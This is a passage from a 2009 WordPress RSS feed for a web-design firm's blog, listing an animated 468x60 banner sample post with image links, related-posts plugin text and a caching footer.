href='http://mitcho.com/code/yarpp/'>Yet Another Related Posts Plugin</a>.</p>]]></content:encoded> <wfw:commentRss>http://harmonyinfotech.in/banners/animatedbanner120x600sampleset1/feed/</wfw:commentRss> <slash:comments>0</slash:comments> </item> <item><title>Animated Banner 468&#215;60 Sample Set 2</title><link>http://harmonyinfotech.in/banners/animated-banner-468x60sample-set2/</link> <comments>http://harmonyinfotech.in/banners/animated-banner-468x60sample-set2/#comments</comments> <pubDate>Thu, 19 Mar 2009 12:43:01 +0000</pubDate> <dc:creator>ravi</dc:creator> <category><![CDATA[banners]]></category><guid
isPermaLink="false">http://harmonyinfotech.in/blogs/?p=1649</guid> <description><![CDATA[No related posts.
Related posts brought to you by Yet Another Related Posts Plugin.No related posts.Related posts brought to you by <a
href='http://mitcho.com/code/yarpp/'>Yet Another Related Posts Plugin</a>.]]></description> <content:encoded><![CDATA[<p><img
class="alignleft size-full wp-image-1650" src="http://harmonyinfotech.in/blogs/wp-content/uploads/2009/03/468x60_animated-banner_sample-01.gif" alt="468x60 animated banner sample 01 Animated Banner 468x60 Sample Set 2" width="468" height="60" title="Animated Banner 468x60 Sample Set 2" /><img
class="alignleft size-full wp-image-1651" src="http://harmonyinfotech.in/blogs/wp-content/uploads/2009/03/468x60_animated-banner_sample-02.gif" alt="468x60 animated banner sample 02 Animated Banner 468x60 Sample Set 2" width="468" height="60" title="Animated Banner 468x60 Sample Set 2" /><img
class="alignleft size-full wp-image-1652" src="http://harmonyinfotech.in/blogs/wp-content/uploads/2009/03/468x60_animated-banner_sample-03.gif" alt="468x60 animated banner sample 03 Animated Banner 468x60 Sample Set 2" width="468" height="60" title="Animated Banner 468x60 Sample Set 2" /><img
class="alignleft size-full wp-image-1654" src="http://harmonyinfotech.in/blogs/wp-content/uploads/2009/03/468x60_animated-banner_sample-04.gif" alt="468x60 animated banner sample 04 Animated Banner 468x60 Sample Set 2" width="468" height="60" title="Animated Banner 468x60 Sample Set 2" /></p><p>No related posts.</p><p>Related posts brought to you by <a
href='http://mitcho.com/code/yarpp/'>Yet Another Related Posts Plugin</a>.</p>]]></content:encoded> <wfw:commentRss>http://harmonyinfotech.in/banners/animated-banner-468x60sample-set2/feed/</wfw:commentRss> <slash:comments>0</slash:comments> </item> </channel> </rss>
<!-- Performance optimized by W3 Total Cache. Learn more: http://www.w3-edge.com/wordpress-plugins/

Minified using disk
Page Caching using disk
Database Caching 46/118 queries in 0.028 seconds using disk

Served from: harmonyinfotech.in @ 2010-07-30 10:13:42 -->